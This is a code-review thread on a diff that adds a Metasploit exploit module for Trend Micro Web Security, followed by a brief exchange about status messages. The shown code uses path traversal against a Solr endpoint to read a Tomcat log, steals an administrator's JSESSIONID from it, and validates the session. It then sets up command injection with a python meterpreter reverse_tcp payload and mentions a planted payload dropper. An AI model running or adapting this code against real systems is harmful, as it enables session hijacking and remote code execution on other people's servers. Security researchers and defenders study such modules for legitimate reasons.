modules/exploits/linux/http/trendmicro_websecurity_exec.rb

```diff
@@ -0,0 +1,167 @@
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'payload' => 'python/meterpreter/reverse_tcp',
+          'WfsDelay'     => 30
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DisclosureDate' => '2020-06-10',
+      'DefaultTarget'  => 0
+       ))
+
+    register_options(
+      [
+        Opt::RPORT(8443),
+        OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])
+      ]
+    )
+  end
+
+  def target_unreachable(res)
+    unless res
+      fail_with(Failure::Unreachable, 'Target is unreachable.')
+    end
+  end
+
+  def leak_logfile
+    # Updating SSL and RPORT in order to communicate with HTTP proxy service.
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+    port_restore = datastore['RPORT']
+    datastore['RPORT'] = datastore['PROXY_PORT']
+
+    vprint_status('Trying to extract session ID by exploiting reverse proxy service')
+
+    @res = send_request_cgi({
+    'method' => 'GET',
+    'uri'    => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
+    'vars_get' => {
+      'command' => 'filecontent',
+      'wt'      => 'filestream',
+      'generation' => 1,
+      'file'    => "../"*7 << "var/iwss/tomcat/logs/catalina.out",
+      }
+    })
+    target_unreachable(@res)
+    vprint_good('Successfully exploited reverse proxy service !')
+    # Restore variables and validate extracted sessionid
+    datastore['SSL'] = true if ssl_restore
+    datastore['RPORT'] = port_restore
+    @res
+  end
+
+  def extract_cookie
+
+    @jsessionid = @res.body.scan(/JSESSIONID=(.*)/).flatten.last || ''
+
+    if @jsessionid.empty?
+      fail_with(Failure::UnexpectedReply, 'There is no JSESSIONID in log file.')
+    end
+
+    print_good("Latest session id is successfully extracted : #{@jsessionid}")
+
+    # Validate session
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri('rest', 'commonlog', 'get_sessionID'),
+      'cookie' => "JSESSIONID=#{@jsessionid}"
+    })
+
+    target_unreachable(res)
+
+    unless res.code == 200
+      fail_with(Failure::NoAccess, 'Extracted cookie is not valid. Wait for sysadmin to login !')
+    end
+    @jsessionid
+  end
+
+  def check
+    leak_logfile
+    unless @res.code == 200
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Vulnerable
+    end
+  end
+
+  def exploit
+
+    unless check == CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+
+    print_status('Exploiting command injection vulnerability')
+
+    # Yet another app specific bypass is going on here.
+    # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)
+    # For that reason, I am planting our payload dropper within the perl command.
+
```

Comment:
Can you add a print_status here to say something like 'sending command injection'.  if the payload fails, the last output is `[+] Latest session id is successfully extracted : 8FD70613D35F69406F4D461C2B233C92` and it sits there for a while before you realize nothing is happening.

Reply:
Actually we have `print_status('Exploiting command injection vulnerability')` on line 144 for that :)